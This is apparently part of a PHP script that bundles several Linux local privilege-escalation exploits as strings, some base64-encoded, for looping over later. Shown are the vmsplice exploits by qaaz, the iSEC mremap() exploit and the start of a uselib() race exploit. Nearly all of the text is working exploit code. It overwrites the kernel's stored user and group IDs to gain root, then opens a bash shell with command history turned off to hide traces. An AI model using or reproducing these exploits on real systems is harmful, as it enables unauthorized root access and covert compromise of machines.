	\"andl %1, %%eax ;\"
	\"movl (%%eax), %0\"
	: \"=r\" (curr)
	: \"i\" (~8191)
	);
	return (void *) curr;
}

#elif defined (__x86_64__)

#ifndef __NR_vmsplice
#define __NR_vmsplice	278
#endif

#define USER_CS		0x23
#define USER_SS		0x2b
#define USER_FL		0x246

static_inline
void	exit_kernel()
{
	__asm__ __volatile__ (
	\"swapgs ;\"
	\"movq %0, 0x20(%%rsp) ;\"
	\"movq %1, 0x18(%%rsp) ;\"
	\"movq %2, 0x10(%%rsp) ;\"
	\"movq %3, 0x08(%%rsp) ;\"
	\"movq %4, 0x00(%%rsp) ;\"
	\"iretq\"
	: : \"i\" (USER_SS), \"r\" (STACK(exit_stack)), \"i\" (USER_FL),
	    \"i\" (USER_CS), \"r\" (exit_code)
	);
}

static_inline
void *	get_current()
{
	unsigned long curr;
	__asm__ __volatile__ (
	\"movq %%gs:(0), %0\"
	: \"=r\" (curr)
	);
	return (void *) curr;
}

#else
#error \"unsupported arch\"
#endif

#if defined (_syscall4)
#define __NR__vmsplice	__NR_vmsplice
_syscall4(
	long, _vmsplice,
	int, fd,
	struct iovec *, iov,
	unsigned long, nr_segs,
	unsigned int, flags)

#else
#define _vmsplice(fd,io,nr,fl)	syscall(__NR_vmsplice, (fd), (io), (nr), (fl))
#endif

static uint uid, gid;

void	kernel_code()
{
	int	i;
	uint	*p = get_current();

	for (i = 0; i < 1024-13; i++) {
		if (p[0] == uid && p[1] == uid &&
		    p[2] == uid && p[3] == uid &&
		    p[4] == gid && p[5] == gid &&
		    p[6] == gid && p[7] == gid) {
			p[0] = p[1] = p[2] = p[3] = 0;
			p[4] = p[5] = p[6] = p[7] = 0;
			p = (uint *) ((char *)(p + 8) + sizeof(void *));
			p[0] = p[1] = p[2] = ~0;
			break;
		}
		p++;
	}	

	exit_kernel();
}

void	exit_code()
{
	if (getuid() != 0)
		die(\"wtf\", 0);

	printf(\"[+] root\\n\");
	putenv(\"HISTFILE=/dev/null\");
	execl(\"/bin/bash\", \"bash\", \"-i\", NULL);
	die(\"/bin/bash\", errno);
}

int	main(int argc, char *argv[])
{
	int		pi[2];
	size_t		map_size;
	char *		map_addr;
	struct iovec	iov;
	struct page *	pages[5];

	uid = getuid();
	gid = getgid();
	setresuid(uid, uid, uid);
	setresgid(gid, gid, gid);

	printf(\"-----------------------------------\\n\");
	printf(\" Linux vmsplice Local Root Exploit\\n\");
	printf(\" By qaaz\\n\");
	printf(\"-----------------------------------\\n\");

	if (!uid || !gid)
		die(\"!@#$\", 0);

	/*****/
	pages[0] = *(void **) &(int[2]){0,PAGE_SIZE};
	pages[1] = pages[0] + 1;

	map_size = PAGE_SIZE;
	map_addr = mmap(pages[0], map_size, PROT_READ | PROT_WRITE,
	                MAP_FIXED | MAP_PRIVATE | MAP_ANONYMOUS, -1, 0);
	if (map_addr == MAP_FAILED)
		die(\"mmap\", errno);

	memset(map_addr, 0, map_size);
	printf(\"[+] mmap: 0x%lx .. 0x%lx\\n\", map_addr, map_addr + map_size);
	printf(\"[+] page: 0x%lx\\n\", pages[0]);
	printf(\"[+] page: 0x%lx\\n\", pages[1]);

	pages[0]->flags    = 1 << PG_compound;
	pages[0]->private  = (unsigned long) pages[0];
	pages[0]->count    = 1;
	pages[1]->lru.next = (long) kernel_code;

	/*****/
	pages[2] = *(void **) pages[0];
	pages[3] = pages[2] + 1;

	map_size = PAGE_SIZE;
	map_addr = mmap(pages[2], map_size, PROT_READ | PROT_WRITE,
	                MAP_FIXED | MAP_PRIVATE | MAP_ANONYMOUS, -1, 0);
	if (map_addr == MAP_FAILED)
		die(\"mmap\", errno);

	memset(map_addr, 0, map_size);
	printf(\"[+] mmap: 0x%lx .. 0x%lx\\n\", map_addr, map_addr + map_size);
	printf(\"[+] page: 0x%lx\\n\", pages[2]);
	printf(\"[+] page: 0x%lx\\n\", pages[3]);

	pages[2]->flags    = 1 << PG_compound;
	pages[2]->private  = (unsigned long) pages[2];
	pages[2]->count    = 1;
	pages[3]->lru.next = (long) kernel_code;

	/*****/
	pages[4] = *(void **) &(int[2]){PAGE_SIZE,0};
	map_size = PAGE_SIZE;
	map_addr = mmap(pages[4], map_size, PROT_READ | PROT_WRITE,
	                MAP_FIXED | MAP_PRIVATE | MAP_ANONYMOUS, -1, 0);
	if (map_addr == MAP_FAILED)
		die(\"mmap\", errno);
	memset(map_addr, 0, map_size);
	printf(\"[+] mmap: 0x%lx .. 0x%lx\\n\", map_addr, map_addr + map_size);
	printf(\"[+] page: 0x%lx\\n\", pages[4]);

	/*****/
	map_size = (PIPE_BUFFERS * 3 + 2) * PAGE_SIZE;
	map_addr = mmap(NULL, map_size, PROT_READ | PROT_WRITE,
	                MAP_PRIVATE | MAP_ANONYMOUS, -1, 0);
	if (map_addr == MAP_FAILED)
		die(\"mmap\", errno);

	memset(map_addr, 0, map_size);
	printf(\"[+] mmap: 0x%lx .. 0x%lx\\n\", map_addr, map_addr + map_size);

	/*****/
	map_size -= 2 * PAGE_SIZE;
	if (munmap(map_addr + map_size, PAGE_SIZE) < 0)
		die(\"munmap\", errno);

	/*****/
	if (pipe(pi) < 0) die(\"pipe\", errno);
	close(pi[0]);

	iov.iov_base = map_addr;
	iov.iov_len  = ULONG_MAX;

	signal(SIGPIPE, exit_code);
	_vmsplice(pi[1], &iov, 1, 0);
	die(\"vmsplice\", errno);
	return 0;
}
");

//Linux 2.6.23 - 2.6.24
$two_six[3] = base64_decode("LyoNCiAqIGRpYW5lX2xhbmVfZnVja2VkX2hhcmQuYw0KICoNCiAqIExpbnV4IHZtc3BsaWNlIExvY2FsIFJvb3QgRXhwbG9pdA0KICogQnkgcWFheg0KICoNCiAqIExpbnV4IDIuNi4yMyAtIDIuNi4yNA0KICovDQojZGVmaW5lIF9HTlVfU09VUkNFDQojaW5jbHVkZSA8c3RkaW8uaD4NCiNpbmNsdWRlIDxlcnJuby5oPg0KI2luY2x1ZGUgPHN0ZGxpYi5oPg0KI2luY2x1ZGUgPHN0cmluZy5oPg0KI2luY2x1ZGUgPHVuaXN0ZC5oPg0KI2luY2x1ZGUgPHN5cy91aW8uaD4NCg0KI2RlZmluZSBUQVJHRVRfUEFUVEVSTgkJXCIgc3lzX3ZtODZvbGRcIg0KI2RlZmluZSBUQVJHRVRfU1lTQ0FMTAkJMTEzDQoNCiNpZm5kZWYgX19OUl92bXNwbGljZQ0KI2RlZmluZSBfX05SX3Ztc3BsaWNlCQkzMTYNCiNlbmRpZg0KDQojZGVmaW5lIF92bXNwbGljZShmZCxpbyxucixmbCkJc3lzY2FsbChfX05SX3Ztc3BsaWNlLCAoZmQpLCAoaW8pLCAobnIpLCAoZmwpKQ0KI2RlZmluZSBnaW1tZXJvb3QoKQkJc3lzY2FsbChUQVJHRVRfU1lTQ0FMTCwgMzEzMzcsIGtlcm5lbF9jb2RlLCAxLCAyLCAzLCA0KQ0KDQojZGVmaW5lIFRSQU1QX0NPREUJCSh2b2lkICopIHRyYW1wb2xpbmUJDQojZGVmaW5lIFRSQU1QX1NJWkUJCSggc2l6ZW9mKHRyYW1wb2xpbmUpIC0gMSApDQoNCnVuc2lnbmVkIGNoYXIgdHJhbXBvbGluZVtdID0NClwiXFx4OGJcXHg1Y1xceDI0XFx4MDRcIgkJLyogbW92ICAgIDB4NCglZXNwKSwlZWJ4CSovDQpcIlxceDhiXFx4NGNcXHgyNFxceDA4XCIJCS8qIG1vdiAgICAweDgoJWVzcCksJWVjeAkqLw0KXCJcXHg4MVxceGZiXFx4NjlcXHg3YVxceDAwXFx4MDBcIgkvKiBjbXAgICAgJDMxMzM3LCVlYngJCSovDQpcIlxceDc1XFx4MDJcIgkJCS8qIGpuZSAgICArMgkJCSovDQpcIlxceGZmXFx4ZDFcIgkJCS8qIGNhbGwgICAqJWVjeAkJCSovDQpcIlxceGI4XFx4ZWFcXHhmZlxceGZmXFx4ZmZcIgkJLyogbW92ICAgICQtRUlOVkFMLCVlYXgJCSovDQpcIlxceGMzXCIJCQkJLyogcmV0CQkJCSovDQo7DQoNCnZvaWQJZGllKGNoYXIgKm1zZywgaW50IGVycikNCnsNCglwcmludGYoZXJyID8gXCJbLV0gJXM6ICVzXFxuXCIgOiBcIlstXSAlc1xcblwiLCBtc2csIHN0cmVycm9yKGVycikpOw0KCWZmbHVzaChzdGRvdXQpOw0KCWZmbHVzaChzdGRlcnIpOw0KCWV4aXQoMSk7DQp9DQoNCmxvbmcJZ2V0X3RhcmdldCgpDQp7DQoJRklMRQkqZjsNCglsb25nCWFkZHIgPSAwOw0KCWNoYXIJbGluZVsxMjhdOw0KDQoJZiA9IGZvcGVuKFwiL3Byb2Mva2FsbHN5bXNcIiwgXCJyXCIpOw0KCWlmICghZikgZGllKFwiL3Byb2Mva2FsbHN5bXNcIiwgZXJybm8pOw0KDQoJd2hpbGUgKGZnZXRzKGxpbmUsIHNpemVvZihsaW5lKSwgZikpIHsNCgkJaWYgKHN0cnN0cihsaW5lLCBUQVJHRVRfUEFUVEVSTikpIHsNCgkJCWFkZHIgPSBzdHJ0b3VsKGxpbmUsIE5VTEwsIDE2KTsNCgkJCWJyZWFrOw0KCQl9DQoJfQ0KDQoJZmNsb3NlKGYpOw0KCXJldHVybiBhZGRyOw0KfQ0KDQpzdGF0aWMgaW5saW5lIF9fYXR0cmlidXRlX18oKGFsd2F5c19pbmxpbmUpKQ0Kdm9pZCAqCWdldF9jdXJyZW50KCkNCnsNCgl1bnNpZ25lZCBsb25nIGN1cnI7DQoJX19hc21fXyBfX3ZvbGF0aWxlX18gKA0KCVwibW92bCAlJWVzcCwgJSVlYXggO1wiDQoJXCJhbmRsICUxLCAlJWVheCA7XCINCglcIm1vdmwgKCUlZWF4KSwgJTBcIg0KCTogXCI9clwiIChjdXJyKQ0KCTogXCJpXCIgKH44MTkxKQ0KCSk7DQoJcmV0dXJuICh2b2lkICopIGN1cnI7DQp9DQoNCnN0YXRpYyB1aW50IHVpZCwgZ2lkOw0KDQp2b2lkCWtlcm5lbF9jb2RlKCkNCnsNCglpbnQJaTsNCgl1aW50CSpwID0gZ2V0X2N1cnJlbnQoKTsNCg0KCWZvciAoaSA9IDA7IGkgPCAxMDI0LTEzOyBpKyspIHsNCgkJaWYgKHBbMF0gPT0gdWlkICYmIHBbMV0gPT0gdWlkICYmDQoJCSAgICBwWzJdID09IHVpZCAmJiBwWzNdID09IHVpZCAmJg0KCQkgICAgcFs0XSA9PSBnaWQgJiYgcFs1XSA9PSBnaWQgJiYNCgkJICAgIHBbNl0gPT0gZ2lkICYmIHBbN10gPT0gZ2lkKSB7DQoJCQlwWzBdID0gcFsxXSA9IHBbMl0gPSBwWzNdID0gMDsNCgkJCXBbNF0gPSBwWzVdID0gcFs2XSA9IHBbN10gPSAwOw0KCQkJcCA9ICh1aW50ICopICgoY2hhciAqKShwICsgOCkgKyBzaXplb2Yodm9pZCAqKSk7DQoJCQlwWzBdID0gcFsxXSA9IHBbMl0gPSB+MDsNCgkJCWJyZWFrOw0KCQl9DQoJCXArKzsNCgl9CQ0KfQ0KDQppbnQJbWFpbihpbnQgYXJnYywgY2hhciAqYXJndltdKQ0Kew0KCWludAkJcGlbMl07DQoJbG9uZwkJYWRkcjsNCglzdHJ1Y3QgaW92ZWMJaW92Ow0KDQoJdWlkID0gZ2V0dWlkKCk7DQoJZ2lkID0gZ2V0Z2lkKCk7DQoJc2V0cmVzdWlkKHVpZCwgdWlkLCB1aWQpOw0KCXNldHJlc2dpZChnaWQsIGdpZCwgZ2lkKTsNCg0KCXByaW50ZihcIi0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tXFxuXCIpOw0KCXByaW50ZihcIiBMaW51eCB2bXNwbGljZSBMb2NhbCBSb290IEV4cGxvaXRcXG5cIik7DQoJcHJpbnRmKFwiIEJ5IHFhYXpcXG5cIik7DQoJcHJpbnRmKFwiLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS1cXG5cIik7DQoNCglpZiAoIXVpZCB8fCAhZ2lkKQ0KCQlkaWUoXCIhQCMkXCIsIDApOw0KDQoJYWRkciA9IGdldF90YXJnZXQoKTsNCglwcmludGYoXCJbK10gYWRkcjogMHglbHhcXG5cIiwgYWRkcik7DQoNCglpZiAocGlwZShwaSkgPCAwKQ0KCQlkaWUoXCJwaXBlXCIsIGVycm5vKTsNCg0KCWlvdi5pb3ZfYmFzZSA9ICh2b2lkICopIGFkZHI7DQoJaW92Lmlvdl9sZW4gID0gVFJBTVBfU0laRTsNCg0KCXdyaXRlKHBpWzFdLCBUUkFNUF9DT0RFLCBUUkFNUF9TSVpFKTsNCglfdm1zcGxpY2UocGlbMF0sICZpb3YsIDEsIDApOw0KDQoJZ2ltbWVyb290KCk7DQoNCglpZiAoZ2V0dWlkKCkgIT0gMCkNCgkJZGllKFwid3RmXCIsIDApOw0KDQoJcHJpbnRmKFwiWytdIHJvb3RcXG5cIik7DQoJcHV0ZW52KFwiSElTVEZJTEU9L2Rldi9udWxsXCIpOw0KCWV4ZWNsKFwiL2Jpbi9iYXNoXCIsIFwiYmFzaFwiLCBcIi1pXCIsIE5VTEwpOw0KCWRpZShcIi9iaW4vYmFzaFwiLCBlcnJubyk7DQoJcmV0dXJuIDA7DQp9DQo=");


$two_four = array(); // all 2.4 exploits stored as an array for later foreach usage
// All the 2.4 exploits from Milw0rm cause I'm 1337 like that
$two_four[0] = base64_decode("/*
 * Linux kernel mremap() bound checking bug exploit.
 *
 * Bug found by Paul Starzetz <paul isec pl>
 *
 * Copyright (c) 2004  iSEC Security Research. All Rights Reserved.
 *
 * THIS PROGRAM IS FOR EDUCATIONAL PURPOSES *ONLY* IT IS PROVIDED \"AS IS\"
 * AND WITHOUT ANY WARRANTY. COPYING, PRINTING, DISTRIBUTION, MODIFICATION
 * WITHOUT PERMISSION OF THE AUTHOR IS STRICTLY PROHIBITED.
 */

#include <stdio.h>
#include <stdlib.h>
#include <errno.h>
#include <string.h>
#include <fcntl.h>
#include <unistd.h>
#include <syscall.h>
#include <signal.h>
#include <time.h>
#include <sched.h>

#include <sys/mman.h>
#include <sys/stat.h>
#include <sys/wait.h>

#include <asm/page.h>

#define MREMAP_MAYMOVE	1
#define MREMAP_FIXED	2

#define str(s) 	#s
#define xstr(s) str(s)

#define DSIGNAL		SIGCHLD
#define CLONEFL		(DSIGNAL|CLONE_FS|CLONE_FILES|CLONE_SIGHAND|CLONE_VFORK)
#define PAGEADDR	0x2000

#define RNDINT		512

#define NUMVMA		(3 * 5 * 257)
#define NUMFORK		(17 * 65537)

#define DUPTO		1000
#define TMPLEN		256

#define __NR_sys_mremap	163

_syscall5(ulong, sys_mremap, ulong, a, ulong, b, ulong, c, ulong, d, ulong, e);
unsigned long sys_mremap(unsigned long addr, unsigned long old_len, unsigned long
new_len,
			 unsigned long flags, unsigned long new_addr);


static volatile int pid = 0, ppid, hpid, *victim, *fops, blah = 0, dummy = 0, uid,
gid;
static volatile int *vma_ro, *vma_rw, *tmp;
static volatile unsigned fake_file[16];


void fatal(const char * msg)
{
	printf(\"\\n\");
	if (!errno) {
		fprintf(stderr, \"FATAL: %s\\n\", msg);
	} else {
		perror(msg);
	}

	printf(\"\\nentering endless loop\");
	fflush(stdout);
	fflush(stderr);
	while (1) pause();
}

void kernel_code(void * file, loff_t offset, int origin)
{
	int i, c;
	int *v;

	if (!file)
		goto out;

	__asm__(\"movl	%%esp, %0\" : : \"m\" (c));

	c &= 0xffffe000;
	v = (void *) c;

	for (i = 0; i < PAGE_SIZE / sizeof(*v) - 1; i++) {
		if (v[i] == uid && v[i+1] == uid) {
			i++; v[i++] = 0; v[i++] = 0; v[i++] = 0;
		}
		if (v[i] == gid) {
			v[i++] = 0; v[i++] = 0; v[i++] = 0; v[i++] = 0;
			break;
		}
	}
out:
	dummy++;
}

void try_to_exploit(void)
{
	int v = 0;

	v += fops[0];
	v += fake_file[0];

	kernel_code(0, 0, v);
	lseek(DUPTO, 0, SEEK_SET);

	if (geteuid()) {
		printf(\"\\nFAILED uid!=0\"); fflush(stdout);
		errno =- ENOSYS;
		fatal(\"uid change\");
	}

	printf(\"\\n[+] PID %d GOT UID 0, enjoy!\", getpid()); fflush(stdout);

	kill(ppid, SIGUSR1);
	setresuid(0, 0, 0);
	sleep(1);

	printf(\"\\n\\n\"); fflush(stdout);

	execl(\"/bin/bash\", \"bash\", NULL);
	fatal(\"burp\");
}

void cleanup(int v)
{
	victim[DUPTO] = victim[0];
	kill(0, SIGUSR2);
}


void redirect_filp(int v)
{
	printf(\"\\n[!] parent check race... \"); fflush(stdout);

	if (victim[DUPTO] && victim[0] == victim[DUPTO]) {
		printf(\"SUCCESS, cought SLAB page!\"); fflush(stdout);
		victim[DUPTO] = (unsigned) & fake_file;
		signal(SIGUSR1, &cleanup);
		kill(pid, SIGUSR1);
	} else {
		printf(\"FAILED!\");
	}
	fflush(stdout);
}

int get_slab_objs(void)
{
	FILE * fp;
	int c, d, u = 0, a = 0;
	static char line[TMPLEN], name[TMPLEN];

	fp = fopen(\"/proc/slabinfo\", \"r\");
	if (!fp)
		fatal(\"fopen\");

	fgets(name, sizeof(name) - 1, fp);
	do {
		c = u = a =- 1;
		if (!fgets(line, sizeof(line) - 1, fp))
			break;
c = sscanf(line, \"%s %u %u %u %u %u %u\", name, &u, &a, &d, &d, &d, &d);
	} while (strcmp(name, \"size-4096\"));
	
	fclose(fp);

	return c == 7 ? a - u : -1;
}

void unprotect(int v)
{
	int n, c = 1;

	*victim = 0;
	printf(\"\\n[+] parent unprotected PTE \"); fflush(stdout);

	dup2(0, 2);
	while (1) {
		n = get_slab_objs();
		if (n < 0)
			fatal(\"read slabinfo\");
		if (n > 0) {
			printf(\"\\n    depopulate SLAB #%d\", c++);
			blah = 0; kill(hpid, SIGUSR1);
			while (!blah) pause();
		}
		if (!n) {
			blah = 0; kill(hpid, SIGUSR1);
			while (!blah) pause();
			dup2(0, DUPTO);
			break;
		}
	}

	signal(SIGUSR1, &redirect_filp);
	kill(pid, SIGUSR1);
}

void cleanup_vmas(void)
{
	int i = NUMVMA;

	while (1) {
		tmp = mmap((void *) (PAGEADDR - PAGE_SIZE), PAGE_SIZE, PROT_READ,
				MAP_FIXED|MAP_ANONYMOUS|MAP_PRIVATE, 0, 0);
		if (tmp != (void *) (PAGEADDR - PAGE_SIZE)) {
			printf(\"\\n[-] ERROR unmapping %d\", i); fflush(stdout);
			fatal(\"unmap1\");
		}
		i--;
		if (!i)
			break;

	tmp = mmap((void *) (PAGEADDR - PAGE_SIZE), PAGE_SIZE, PROT_READ|PROT_WRITE,
				MAP_FIXED|MAP_PRIVATE|MAP_ANONYMOUS, 0, 0);
	if (tmp != (void *) (PAGEADDR - PAGE_SIZE)) {
			printf(\"\\n[-] ERROR unmapping %d\", i); fflush(stdout);
			fatal(\"unmap2\");
		}
		i--;
		if (!i)
			break;
	}
}

void catchme(int v)
{
	blah++;
}

void exitme(int v)
{
	_exit(0);
}

void childrip(int v)
{
	waitpid(-1, 0, WNOHANG);
}

void slab_helper(void)
{
	signal(SIGUSR1, &catchme);
	signal(SIGUSR2, &exitme);
	blah = 0;

	while (1) {
		while (!blah) pause();

		blah = 0;
		if (!fork()) {
			dup2(0, DUPTO);
			kill(getppid(), SIGUSR1);
			while (1) pause();
		} else {
			while (!blah) pause();
			blah = 0; kill(ppid, SIGUSR2);
		}
	}
	exit(0);
}

int main(void)
{
	int i, r, v, cnt;
	time_t start;

	srand(time(NULL) + getpid());
	ppid = getpid();
	uid = getuid();
	gid = getgid();

	hpid = fork();
	if (!hpid)
		slab_helper();

	fops = mmap(0, PAGE_SIZE, PROT_EXEC|PROT_READ|PROT_WRITE,
			MAP_PRIVATE|MAP_ANONYMOUS, 0, 0);
	if (fops == MAP_FAILED)
		fatal(\"mmap fops VMA\");
	for (i = 0; i < PAGE_SIZE / sizeof(*fops); i++)
		fops[i] = (unsigned)&kernel_code;
	for (i = 0; i < sizeof(fake_file) / sizeof(*fake_file); i++)
		fake_file[i] = (unsigned)fops;

	vma_ro = mmap(0, PAGE_SIZE, PROT_READ, MAP_PRIVATE|MAP_ANONYMOUS, 0, 0);
	if (vma_ro == MAP_FAILED)
		fatal(\"mmap1\");

	vma_rw = mmap(0, PAGE_SIZE, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, 0, 0);
	if (vma_rw == MAP_FAILED)
		fatal(\"mmap2\");

	cnt = NUMVMA;
	while (1) {
		r = sys_mremap((ulong)vma_ro, 0, 0, MREMAP_FIXED|MREMAP_MAYMOVE, PAGEADDR);
		if (r == (-1)) {
			printf(\"\\n[-] ERROR remapping\"); fflush(stdout);
			fatal(\"remap1\");
		}
		cnt--;
		if (!cnt) break;

		r = sys_mremap((ulong)vma_rw, 0, 0, MREMAP_FIXED|MREMAP_MAYMOVE, PAGEADDR);
		if (r == (-1)) {
			printf(\"\\n[-] ERROR remapping\"); fflush(stdout);
			fatal(\"remap2\");
		}
		cnt--;
		if (!cnt) break;
	}

	victim = mmap((void*)PAGEADDR, PAGE_SIZE, PROT_EXEC|PROT_READ|PROT_WRITE,
			MAP_FIXED|MAP_PRIVATE|MAP_ANONYMOUS, 0, 0);
	if (victim != (void *) PAGEADDR)
		fatal(\"mmap victim VMA\");

	v = *victim;
	*victim = v + 1;

	signal(SIGUSR1, &unprotect);
	signal(SIGUSR2, &catchme);
	signal(SIGCHLD, &childrip);
	printf(\"\\n[+] Please wait...HEAVY SYSTEM LOAD!\\n\"); fflush(stdout);
	start = time(NULL);

	cnt = NUMFORK;
	v = 0;
	while (1) {
		cnt--;
		v--;
		dummy += *victim;

		if (cnt > 1) {
			__asm__(
			\"pusha				\\n\"
			\"movl %1, %%eax			\\n\"
			\"movl $(\"xstr(CLONEFL)\"), %%ebx	\\n\"
			\"movl %%esp, %%ecx		\\n\"
			\"movl $120, %%eax		\\n\"
			\"int  $0x80			\\n\"
			\"movl %%eax, %0			\\n\"
			\"popa				\\n\"
			: : \"m\" (pid), \"m\" (dummy)
			);
		} else {
			pid = fork();
		}

		if (pid) {
			if (v <= 0 && cnt > 0) {
				float eta, tm;
				v = rand() % RNDINT / 2 + RNDINT / 2;
				tm = eta = (float)(time(NULL) - start);
				eta *= (float)NUMFORK;
				eta /= (float)(NUMFORK - cnt);
				printf(\"\\r\\t%u of %u [ %u %%  ETA %6.1f s ]          \",
				NUMFORK - cnt, NUMFORK, (100 * (NUMFORK - cnt)) / NUMFORK, eta - tm);
				fflush(stdout);
			}
			if (cnt) {
				waitpid(pid, 0, 0);
				continue;
			}
			if (!cnt) {
				while (1) {
					 r = wait(NULL);
					 if (r == pid) {
					cleanup_vmas();
					while (1) { kill(0, SIGUSR2); kill(0, SIGSTOP); pause(); }
					 }
				}
			}
		}

		else {
			cleanup_vmas();

			if (cnt > 0) {
				_exit(0);
			}

		printf(\"\\n[+] overflow done, the moment of truth...\"); fflush(stdout);
			sleep(1);

			signal(SIGUSR1, &catchme);
			munmap(0, PAGE_SIZE);
			dup2(0, 2);
			blah = 0; kill(ppid, SIGUSR1);
			while (!blah) pause();

			munmap((void *)victim, PAGE_SIZE);
			dup2(0, DUPTO);

			blah = 0; kill(ppid, SIGUSR1);
			while (!blah) pause();
			try_to_exploit();
			while (1) pause();
		}
	}
	return 0;
}
");
$two_four[1] = base64_decode("/*
 * Linux kernel 2.4 uselib() privilege elevation exploit.
 *
 * original exploit source from http://isec.pl
 * reference: http://isec.pl/vulnerabilities/isec-0021-uselib.txt
 *
 * I modified the Paul Starzetz\\\'s exploit, made it more possible
 * to race successfully. The exploit still works only on 2.4 series.  
 * It should be also works on 2.4 SMP, but not easy. 
 *
 * thx newbug.
 *
 * Tim Hsu <timhsu at chroot.org> Jan 2005.
 *
 */
 
#define _GNU_SOURCE

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <fcntl.h>
#include <unistd.h>
#include <errno.h>
#include <sched.h>
#include <syscall.h>
#include <limits.h>

#include <sys/types.h>
#include <sys/wait.h>
#include <sys/time.h>
#include <sys/mman.h>
#include <sys/sysinfo.h>

#include <linux/elf.h>
#include <linux/linkage.h>

#include <asm/page.h>
#include <asm/ldt.h>
#include <asm/segment.h>

#define str(s) #s
#define xstr(s) str(s)

#define MREMAP_MAYMOVE  1


//	temp lib location
#define LIBNAME 	\\\"/tmp/_elf_lib\\\"

//	shell name
#define	SHELL		\\\"/bin/bash\\\"

//	time delta to detect race
#define RACEDELTA	5000

//	if you have more deadbabes in memory, change this
#define MAGIC		0xdeadbabe


//	do not touch
#define	SLAB_THRSH	128
#define	SLAB_PER_CHLD	(INT_MAX - 1)
#define LIB_SIZE	( PAGE_SIZE * 4 )
#define STACK_SIZE	( PAGE_SIZE * 4 )

#define LDT_PAGES	( (LDT_ENTRIES*LDT_ENTRY_SIZE+PAGE_SIZE-1)/PAGE_SIZE )

#define ENTRY_GATE	( LDT_ENTRIES-1 )
#define SEL_GATE	( (ENTRY_GATE<<3)|0x07 )

#define ENTRY_LCS	( ENTRY_GATE-2 )
#define SEL_LCS		( (ENTRY_LCS<<3)|0x04 )

#define ENTRY_LDS	( ENTRY_GATE-1 )
#define SEL_LDS		( (ENTRY_LDS<<3)|0x04 )

#define kB		* 1024
#define MB		* 1024 kB
#define GB		* 1024 MB

#define TMPLEN		256
#define PGD_SIZE	( PAGE_SIZE*1024 )


extern char **environ;

static char cstack[STACK_SIZE];
static char name[TMPLEN];
static char line[TMPLEN];

static pid_t consume_pid;

static volatile int
	val = 0,
	go = 0,
	finish = 0,
	scnt = 0,
	ccnt=0,
	delta = 0,
	delta_max = RACEDELTA,
	map_flags = PROT_WRITE|PROT_READ;


static int
	fstop=0,
	silent=0,
	pidx,
	pnum=0,
	smp_max=0,
	smp,
	wtime=2,
	cpid,
	uid,
	task_size,
	old_esp,
	lib_addr,
	map_count=0,
	map_base=0,
	map_addr,
	addr_min,
	addr_max,
	vma_start,
	vma_end,
	max_page;


static struct timeval tm1, tm2;

static char *myenv[] = {\\\"TERM=vt100\\\",
			\\\"HISTFILE=/dev/null\\\",
			NULL};

static char hellc0de[] = \\\"\\\\x49\\\\x6e\\\\x74\\\\x65\\\\x6c\\\\x65\\\\x63\\\\x74\\\\x75\\\\x61\\\\x6c\\\\x20\\\\x70\\\\x72\\\\x6f\\\\x70\\\"
                         \\\"\\\\x65\\\\x72\\\\x74\\\\x79\\\\x20\\\\x6f\\\\x66\\\\x20\\\\x49\\\\x68\\\\x61\\\\x51\\\\x75\\\\x65\\\\x52\\\\x00\\\";


static char *pagemap, *libname=LIBNAME, *shellname=SHELL;



#define __NR_sys_gettimeofday	__NR_gettimeofday
#define __NR_sys_sched_yield	__NR_sched_yield
#define __NR_sys_madvise	__NR_madvise
#define __NR_sys_uselib		__NR_uselib
#define __NR_sys_mmap2		__NR_mmap2
#define __NR_sys_munmap		__NR_munmap
#define __NR_sys_mprotect	__NR_mprotect
#define __NR_sys_mremap		__NR_mremap

inline _syscall6(int, sys_mmap2, int, a, int, b, int, c, int, d, int, e, int, f);

inline _syscall5(int, sys_mremap, int, a, int, b, int, c, int, d, int, e);

inline _syscall3(int, sys_madvise, void*, a, int, b, int, c);
inline _syscall3(int, sys_mprotect, int, a, int, b, int, c);
inline _syscall3( int, modify_ldt, int, func, void *, ptr, int, bytecount );

inline _syscall2(int, sys_gettimeofday, void*, a, void*, b);
inline _syscall2(int, sys_munmap, int, a, int, b);

inline _syscall1(int, sys_uselib, char*, l);

inline _syscall0(void, sys_sched_yield);

 
int consume_memory()
{
	struct sysinfo info;
	char *vmem;
	
	sysinfo(&info);
	vmem = malloc(info.freeram);
	if (vmem == NULL)
	{
		perror(\\\"malloc\\\");
		return -1;
	}
	memset(vmem, 0x90, info.freeram);

}


inline int tmdiff(struct timeval *t1, struct timeval *t2)
{
int r;

	r=t2->tv_sec - t1->tv_sec;
	r*=1000000;
	r+=t2->tv_usec - t1->tv_usec;
return r;
}


void fatal(const char *message, int critical)
{
int sig = critical? SIGSTOP : (fstop? SIGSTOP : SIGKILL);

	if(!errno) {
		fprintf(stdout, \\\"\\\\n[-] FAILED: %s \\\", message);
	} else {
		fprintf(stdout, \\\"\\\\n[-] FAILED: %s (%s) \\\", message,
			(char*) (strerror(errno)) );
	}
	if(critical)
		printf(\\\"\\\\nCRITICAL, entering endless loop\\\");
	printf(\\\"\\\\n\\\");
	fflush(stdout);

	unlink(libname);
	kill(cpid, SIGKILL);
	for(;;) kill(0, sig);
}


//	try to race do_brk sleeping on kmalloc, may need modification for SMP
int raceme(void* v)
{
	finish=1;

	for(;;) {
		errno = 0;

//	check if raced:
recheck:
		if(!go) sys_sched_yield();
		sys_gettimeofday(&tm2, NULL);
		delta = tmdiff(&tm1, &tm2);
		if(!smp_max && delta < (unsigned)delta_max) goto recheck;
		smp = smp_max;

//	check if lib VMAs exist as expected under race condition
recheck2:
		val = sys_madvise((void*) lib_addr, PAGE_SIZE, MADV_NORMAL);
		if(val) continue;
		errno = 0;
		val = sys_madvise((void*) (lib_addr+PAGE_SIZE),
				LIB_SIZE-PAGE_SIZE, MADV_NORMAL);
		if( !val || (val<0 && errno!=ENOMEM) ) continue;

//	SMP?
		smp--;
		if(smp>=0) goto recheck2;

//	recheck race
		if(!go) continue;
		finish++;

//	we need to free one vm_area_struct for mmap to work
		val = sys_mprotect(map_addr, PAGE_SIZE, map_flags);
		if(val) fatal(\\\"mprotect\\\", 0);
		val = sys_mmap2(lib_addr + PAGE_SIZE, PAGE_SIZE*3, PROT_NONE,
			      MAP_PRIVATE|MAP_ANONYMOUS|MAP_FIXED, 0, 0);
		if(-1==val) fatal(\\\"mmap2 race\\\", 0);
